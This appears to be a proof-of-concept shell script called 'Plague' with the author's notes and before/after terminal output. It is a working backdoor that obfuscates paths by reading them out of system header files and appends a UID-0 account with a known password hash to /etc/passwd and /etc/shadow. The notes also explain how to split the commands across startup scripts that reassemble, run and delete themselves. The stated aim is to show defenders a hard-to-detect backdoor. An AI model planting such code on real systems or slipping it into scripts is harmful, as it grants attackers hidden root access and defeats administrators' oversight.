#!/bin.sh # Plague Proof of Concept # J. Oquendo # echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' # places an account called test with the # password test on a machine # Scripted for Linux as a Proof of Concept # easily modified for any nix distro # (BSD, Solaris, QNX, etc) file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h` sed -n '1p' $file|awk -F ":" 'BEGIN{OFS=":"}{$1="test"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' >> $file file2=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h` sed -n '1p' $file2|sed 's/[^:]*:/test:/' >> $file2 # FreeBSD file=`awk 'NR==71 {gsub(/"/,"");print $3}' /usr/include/pwd.h` awk -F ":" 'BEGIN{OFS=":"}{$1="test"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' $file|sed -n '3p' >> $file # blah blah blah ... # file2=`awk 'NR==69 {gsub(/,/,"");print $8}' /usr/include/pwd.h` # sed -n '1p' $file2|sed 's/[^:]*:/test:/' >> $file2 # Yes I know... /usr/sbin/pwd_mkdb -p /etc/master.passwd .. boohoo # fix=`awk 'NR==79 {gsub(/"/,"");print $3}' /usr/include/pwd.h` # up=`awk 'NR==71 {gsub(/"/,"");print $3}' /usr/include/pwd.h` # $fix -p $up # Too bored to continue with the concept. If you don't get it, you don't get it. # Solaris... You finish the rest of the work... file=`sed -n '41p' /usr/include/newt.h |awk '{print $3}'|sed 's/Fg,//g;s/^/\/etc\//g'` file2=`sed -n '57p' /usr/include/unistd.h|awk '{print $3}'|sed 's/"//g'` ....................................................... Plague is an odd proof of concept backdoor keeping tool based on the premise of using existing system files and commands to keep and maintain a backdoor on Linux systems. I could have modified this for BSD, Solaris, etc., but I didn't feel like doing that much work. Besides it's conceptual. The purpose behind it was to give security engineers a glimpse of the perfect backdoor if done correctly and how it would be difficult to detect. There are solely 4 lines in this shell script which add an account to a system. To the untrained *Nix admin, these commands may be overlooked as they are unintrusive... They mention nothing that stands out. Imagine portions of this scattered throughout system scripts compiling in the end (something like Voltron) to run either on startup or shutdown... Sure you would see the account in password but unless you dissect your machine and are CONSTANTLY running something like Tripwire, something like this would be a nightmare. For you Linux users using yum, apt-get, etc., how often do you redo your checksums? Example script called from various files the were Predefined in /etc/rc3.d/ echo "file=`awk 'NR==59 {gsub(/"/,"");print \$3}' /usr/include/paths.h`" >> K1firstfile echo "sed -n '1p' \$file|sed 's/[^:]*:/new_account_name:/' >> $file" >>" >> K2nextfile echo "file2=`awk 'NR==74 {print \$8}' /usr/include/sysexits.h`" >> K3anotherfile echo "sed -n '1p' \$file2|sed 's/[^:]*:/new_account_name:/'' >> $file2" >> K4endingfile echo "rm $file1 $file2" >> K5lastfileremove Each line is placed in one file in executing order where at the end it is all re-compiled, run, then deleted... awk was too long and to me a bit more obvious then sed... And yes I could have gotten the oneliner shorter had I wanted to. But what about the hash in /etc/shadow? Simple... awk -F ":" 'BEGIN{OFS=":"}{$1="new_account_name"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' This places the account "new_account_name" with the password "test" in /etc/shadow Here is the before and after on a Scientfic Linux machine [root@armada ~]# uname -a Linux armada.disgraced.org 2.6.9-34.EL #1 Mon Mar 13 11:31:17 CST 2006 i686 athlon i386 GNU/Linux [root@armada ~]# [root@armada ~]# cat /etc/shadow root://////////:13428:0:99999:7::: bin:*:13428:0:99999:7::: daemon:*:13428:0:99999:7::: adm:*:13428:0:99999:7::: lp:*:13428:0:99999:7::: sync:*:13428:0:99999:7::: shutdown:*:13428:0:99999:7::: halt:*:13428:0:99999:7::: mail:*:13428:0:99999:7::: news:*:13428:0:99999:7::: uucp:*:13428:0:99999:7::: operator:*:13428:0:99999:7::: games:*:13428:0:99999:7::: gopher:*:13428:0:99999:7::: ftp:*:13428:0:99999:7::: nobody:*:13428:0:99999:7::: dbus:!!:13428:0:99999:7::: vcsa:!!:13428:0:99999:7::: rpm:!!:13428:0:99999:7::: haldaemon:!!:13428:0:99999:7::: netdump:!!:13428:0:99999:7::: nscd:!!:13428:0:99999:7::: sshd:!!:13428:0:99999:7::: rpc:!!:13428:0:99999:7::: mailnull:!!:13428:0:99999:7::: smmsp:!!:13428:0:99999:7::: rpcuser:!!:13428:0:99999:7::: nfsnobody:!!:13428:0:99999:7::: pcap:!!:13428:0:99999:7::: apache:!!:13428:0:99999:7::: squid:!!:13428:0:99999:7::: webalizer:!!:13428:0:99999:7::: xfs:!!:13428:0:99999:7::: ntp:!!:13428:0:99999:7::: gdm:!!:13428:0:99999:7::: quagga:!!:13428:0:99999:7::: dovecot:!!:13428:0:99999:7::: postfix:!!:13428:0:99999:7::: mysql:!!:13428:0:99999:7::: sil:!!:13428:0:99999:7::: nagios:!!:13430:0:99999:7::: luzer:!!:13437:0:99999:7::: zenoss:!!:13438:0:99999:7::: [root@armada ~]# [root@armada ~]# cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash sil:x:500:500:Loser:/home/sil:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash alanr:x:502:502::/home/alanr:/bin/bash luzer:x:503:503::/home/luzer:/bin/bash zenoss:x:504:504::/home/zenoss:/bin/bash [root@armada ~]# ./plague [root@armada ~]# [root@armada ~]# cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash sil:x:500:500:Loser:/home/sil:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash alanr:x:502:502::/home/alanr:/bin/bash luzer:x:503:503::/home/luzer:/bin/bash zenoss:x:504:504::/home/zenoss:/bin/bash test:x:0:0:root:/root:/bin/bash [root@armada ~]# [root@armada ~]# cat /etc/shadow root://////////:13428:0:99999:7::: bin:*:13428:0:99999:7::: daemon:*:13428:0:99999:7::: adm:*:13428:0:99999:7::: lp:*:13428:0:99999:7::: sync:*:13428:0:99999:7::: shutdown:*:13428:0:99999:7::: halt:*:13428:0:99999:7::: mail:*:13428:0:99999:7::: news:*:13428:0:99999:7::: uucp:*:13428:0:99999:7::: operator:*:13428:0:99999:7::: games:*:13428:0:99999:7::: gopher:*:13428:0:99999:7::: ftp:*:13428:0:99999:7::: nobody:*:13428:0:99999:7::: dbus:!!:13428:0:99999:7::: vcsa:!!:13428:0:99999:7::: rpm:!!:13428:0:99999:7::: haldaemon:!!:13428:0:99999:7::: netdump:!!:13428:0:99999:7::: nscd:!!:13428:0:99999:7::: sshd:!!:13428:0:99999:7::: rpc:!!:13428:0:99999:7::: mailnull:!!:13428:0:99999:7::: smmsp:!!:13428:0:99999:7::: rpcuser:!!:13428:0:99999:7::: nfsnobody:!!:13428:0:99999:7::: pcap:!!:13428:0:99999:7::: apache:!!:13428:0:99999:7::: squid:!!:13428:0:99999:7::: webalizer:!!:13428:0:99999:7::: xfs:!!:13428:0:99999:7::: ntp:!!:13428:0:99999:7::: gdm:!!:13428:0:99999:7::: quagga:!!:13428:0:99999:7::: dovecot:!!:13428:0:99999:7::: postfix:!!:13428:0:99999:7::: mysql:!!:13428:0:99999:7::: sil:!!:13428:0:99999:7::: nagios:!!:13430:0:99999:7::: luzer:!!:13437:0:99999:7::: zenoss:!!:13438:0:99999:7::: test:$1$N6M3yuA9$JXTgD8q8apf1fgfUT44hW1:13428:0:99999:7:::